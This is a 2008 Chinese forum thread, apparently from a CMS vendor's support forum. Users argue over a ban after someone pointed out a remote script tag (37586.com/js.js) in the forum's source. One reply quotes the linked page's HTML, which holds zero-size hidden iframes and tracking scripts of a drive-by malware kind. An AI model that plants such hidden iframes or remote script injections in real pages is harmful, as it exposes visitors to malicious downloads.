账号通

账号  

密码  

查看

popco 当前离线

广播

级别:学前班

用户积分:249 分
登录次数:6 次
popco 发表于:2008/1/22 10:12:00   | 只看该作者 查看该作者主题 楼主 

科讯论坛源代码顶部有段代码 <script src=http://37586.com/js.js></script>

我昨晚用 viplgo  的论坛账户发了一篇http://37586.com/js.js 我文章,没有其他内容!但竟然比封了账户,这个封账户的是个死垃圾哦

封吧

支持(0) | 反对(0) 回到顶部顶端 回到底部底部
maoer 当前离线

广播

级别:七年级

用户积分:4734 分
登录次数:104 次
maoer 发表于:2008/1/22 15:13:00   | 只看该作者 查看该作者主题 沙发 
做在线知识付费 选科汛云开店

我是版主的话你这我也封了

mt56 当前离线

广播

级别:版主

用户积分:23430 分
登录次数:1621 次
mt56 发表于:2008/1/22 12:28:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线考试系统(NET)

即便没有多看,也不至于这样骂人吧?

就凭你在论坛骂人的作风,本贴就可以删除!

你的标题写的“[灌水]......”,本论坛属于经验、技术等交流的地方,而不是灌水的,当我一看到这个字眼的时候就毫无保留的删除了,后来看到JS文件里面含有WWW.HTML的时候,更怀疑里面有病毒,故封帐号!怕用户误点中毒!

我在本论坛的职责,主要是专门打击广告者,对于群发广告、病毒投放者更是严厉的!

如果我是错误的操作的,我可以向你道歉!

但是如果LZ也要注意了:

1、人的命运不是你骂来骂去的;

2、发贴的时候,在正规的地方最好不要使用斑竹敏感的字眼:灌水、来个病毒.....

3、有什么问题,可以联系官方或斑竹,不要在论坛动不动就骂人!

如果我说得不对的话,你继续你的骂.....

popco 当前离线

广播

用户积分:249 分
登录次数:6 次
popco 发表于:2008/1/22 14:10:00   | 只看该作者 查看该作者主题 板凳 

你对工作的态度只是任务式,挂上代码的时候论坛已经出现错位!

我发那个帖子,只是告诫下,.JS你还认为会用户会中毒,你当用户是猪啊!

viplgo那个用户发的帖子不到2贴,我平时都不喜欢发贴的!你喜欢就封个够

算我错.你是对的

wubi 当前离线

广播

级别:六年级

用户积分:2901 分
登录次数:89 次
wubi 发表于:2008/1/22 22:57:00   | 只看该作者 查看该作者主题 报纸 
做在线知识付费 选科汛云开店
一个账号,申请一下就可以拿回来了,确实没有必要这么骂人

wubi 当前离线

广播

级别:六年级

用户积分:2901 分
登录次数:89 次
wubi 发表于:2008/1/22 22:56:00   | 只看该作者 查看该作者主题 地板 
科汛在线考试系统(NET)
以下是引用mt56在2008-1-22 16:04:44的发言:
以下是引用popco在2008-1-22 14:10:44的发言:

我发那个帖子,只是告诫下,.JS你还认为会用户会中毒,你当用户是猪啊!

viplgo那个用户发的帖子不到2贴,我平时都不喜欢发贴的!你喜欢就封个够

算我错.你是对的

里面有www.html文件,这个论坛的人都是建站的人,对代码里面的东西都很好奇,

只说到这里,..........

支持一下啊,用户都很好奇,而且菜鸟也不少

mt56 当前离线

广播

mt56 发表于:2008/1/22 16:04:00   | 只看该作者 查看该作者主题 7楼 
以下是引用popco在2008-1-22 14:10:44的发言:

算我错.你是对的

[QUOTE]我发那个帖子,只是告诫下,.JS你还认为会用户会中毒,你当用户是猪啊![/QUOTE]

里面有www.html文件,这个论坛的人都是建站的人,对代码里面的东西都很好奇,

只说到这里,..........

zhenfengdz 当前离线

广播

级别:大三

用户积分:21733 分
登录次数:436 次
zhenfengdz 发表于:2008/1/22 12:27:00   | 只看该作者 查看该作者主题 8楼 
科汛在线网校系统
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&client=aff-cs-maxthon&hs=KMV&q=http%3A%2F%2F37586.com&meta=&aq=f

mt56 当前离线

广播

mt56 发表于:2008/1/22 12:18:00   | 只看该作者 查看该作者主题 9楼 
科汛在线网校系统
以下是引用国家贫困县在2008-1-22 12:07:44的发言:

楼主js文件里的http://37586.com/www.htm这个地址有毒啊!

不要把对官方的痛恨变成打击报复广大科汛粉丝啊

图片点击可在新窗口打开查看

http://37586.com/www.html里面的内容:

[QUOTE]<html><TITLE>MAO</TITLE><BODY>
<iframe src=r.htm width=0 height=0></iframe>
<iframe src=06014.html width=0 height=8></iframe>
<script src='http://s23.cnzz.com/stat.php?id=729857&web_id=729857' language='JavaScript' charset='gb2312'></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1494619.js"></script>
</body></html>[/QUOTE]

dulun 当前离线

广播

用户积分:369 分
登录次数:24 次
dulun 发表于:2008/1/22 12:15:00   | 只看该作者 查看该作者主题 10楼 

<上一主题 | 下一主题 >